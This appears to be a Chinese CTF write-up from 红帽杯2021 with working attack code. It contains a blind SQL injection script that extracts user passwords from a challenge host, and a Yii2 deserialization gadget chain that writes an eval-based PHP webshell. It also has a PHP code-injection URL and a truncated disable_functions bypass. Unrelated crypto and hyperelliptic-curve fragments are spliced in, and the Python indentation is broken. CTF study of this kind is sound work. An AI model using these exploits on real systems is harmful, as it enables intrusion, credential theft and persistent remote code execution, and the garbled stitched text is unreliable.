Category - 红帽杯2021

image.php 有sql注入

 

```

import requests
import sys
# Boolean-based blind SQL injection against the `id` parameter of image.php.
# Defender's reading: the server never echoes the injected query's result;
# the only signal is the length of the response, which is enough to recover
# one character per round trip.
session = requests.session()
hh=''  # characters recovered so far, one appended per outer iteration
burp0_url = "http://eci-2zeab1jn4vnk23hzs0z3.cloudeci1.ichunqiu.com:80/image.php"
# i = 1-based character position inside the extracted string,
# j = candidate byte value for that position (30..127 are tried).
for i in range(1,100):
    for j in range(30,129):
        if j==128:
            # No candidate matched this position: treat the string as exhausted.
            sys.exit(1)

        #print(gg)
        # Three payloads are assigned one after another; only the LAST
        # assignment (the `password` column of `users`) is actually sent.
        # The two before it (table names, then column names of `users`) were
        # the earlier enumeration steps and are now dead stores.
        # Spaces are rewritten to `/**/`, presumably to get past a filter on
        # whitespace; for detection, `information_schema`, `group_concat`
        # and `/**/` inside the `id` query parameter are the strings to alert on.
        params={'id':"2/(select/**/ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctf'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='users'),{},1))={})".replace(' ','/**/').format(i,j)}
        params={'id':"2/(select/**/ascii(substr((select group_concat(password)from users),{},1))={})".replace(' ','/**/').format(i,j)}

        r=session.get(burp0_url,params=params)
        a=len(r.text)
        # Oracle: a response longer than 1000 bytes is taken as "comparison
        # true", anything shorter as "false". Binding `id` as a query parameter
        # on the server side (instead of concatenating it into SQL) removes the
        # whole channel.
        if a>1000:
            hh+=chr(j)
            print(hh)
           break

 ```

 

得到密码登录

登录后

File:///flag 得到flag

 

robots.txt看到1ndexx.php .1ndexx.php.swp泄露

index.php?code=<?php+phpinfo();?>

然后访问hack.php得到flag


Yii2漏洞 about 路由反序列化 直接网上exp assert 写shell

```

<?php
namespace yii\rest{
    // Gadget 1 of the chain: a CreateAction whose `checkAccess` callable is
    // the string 'assert'. NOTE(review): the call site that invokes
    // $this->checkAccess with $this->id as its argument lives in Yii's own
    // CreateAction::run and is not on this page; the chain relies on it.
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'assert';
            // Payload string evaluated by assert(): writes a.php into the
            // web root containing an eval() of POST[a]. Only works while
            // assert() still evaluates string arguments (removed in PHP 8)
            // and the web root is writable by the PHP process.
            $this->id = 'file_put_contents("/var/www/html/web/a.php","<?=eval(\\$_POST[a]);?>");';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    // Gadget 2: a Faker Generator with a single formatter entry.
    // Presumably Generator's magic __call (not shown here) looks up the
    // called method name in `formatters` and invokes the stored callable,
    // so a call to isRunning() on this object ends up in CreateAction::run.
    class Generator{
        protected $formatters;

        public function __construct(){

            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}

// poc2
namespace Codeception\Extension{
    use Faker\Generator;
    // Gadget 3 / chain entry point: RunProcess carries the Generator in its
    // private `processes` array. Its __destruct (not on this page) is
    // presumably what iterates `processes` and calls isRunning() on each
    // element once the unserialized object goes out of scope.
    class RunProcess{
        private $processes;
        public function __construct()
        {
            $this->processes = [new Generator()];
        }
    }
}
namespace{
    // Serialize the assembled object graph and base64-encode it for transport.
    // Defender note: the vulnerable condition is an unserialize() of
    // attacker-controlled input while these vendor classes are autoloadable.
    // Fixes are to stop unserializing untrusted data (use JSON), or at least
    // restrict unserialize() with the `allowed_classes` option; base64 blobs
    // decoding to `O:` object markers are a reasonable thing to alert on.
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>

```

写shell

 

需要bypass disable_function

 

Apache mod cgi 绕过

 ```

<?php

$cmd = "/readflag > /tmp/1"; //comman

一看到还以为是小数的背包问题, 仔细想想并不是, 来看一下式子就能懂了, 先看得到密文ct的式子

$ct = 2^{256}(k_0 m_0 + k_1 m_1 + k_2 m_2 + \cdots + k_{23} m_{23}) - e$

这里多了个 $e$，就是把取整直接看成减去一个小数 $e$

$k_n$ 是已知的, 而且是小数, 不能直接造格子, 但我们把 $2^{256}$ 分配给每一项就不一样了, 对于其中一项

$2^{256} k m = 2^{256} \ln p \cdot m = (2^{256} \ln p - e)\, m$

$2^{256} \ln p_i = A_i$，每一项都这么干, 那么整个 $ct$ 就会变成

超椭圆曲线...第一次接触,但搜到了原题
https://pwnthem0le.polito.it/2020/12/20/hxpCTF-2020-Hyper-writeup/
具体原理我不是很懂，也不敢乱说

改一下上面链接的exp就可以了

  1. #sage
  2. import itertools
  3. import struct
  4. p = 10000000000000001119
  5. R.<x> = GF(p)[]
  6. y = x
  7. f = y + y^7
  8. C = HyperellipticCurve(f, 0)
  9. J = C.jacobian()
  10. Ds = [J(C(x, min(f(x).sqrt(0,1)))) for x in (11,22,33)]
  11. enc = bytes.fromhex('66def695b20eeae3141ea80240e9bc7138c8fc5aef20532282944ebbbad76a6e17446e92de5512091fe81255eb34a0e22a86a090e25dbbe3141aff0542f5')
  12. known_pt = ('a'*20+'flag').encode()
  13. rng_output = bytes(e^^m for e,m in zip(enc, known_pt))
  14. blocks = [rng_output[i:i+8] for i in range(0, len(rng_output), 8)]
  15. ui = [int.from_bytes(r, 'little') for r in blocks]
  16. u = x^3 + ui[2]*x^2 + ui[1]*x + ui[0]
  17. L = GF(p).algebraic_closure()
  18. FL = True
  19. while FL:
  20. roots = [r[0] for r in u.change_ring(L).roots()]
  21. RR.<zz> = PolynomialRing(L)
  22. v = RR.lagrange_polynomial([(xi, f(xi).sqrt()) for xi in roots])
  23. vi = [v.coefficients()[i].as_finite_f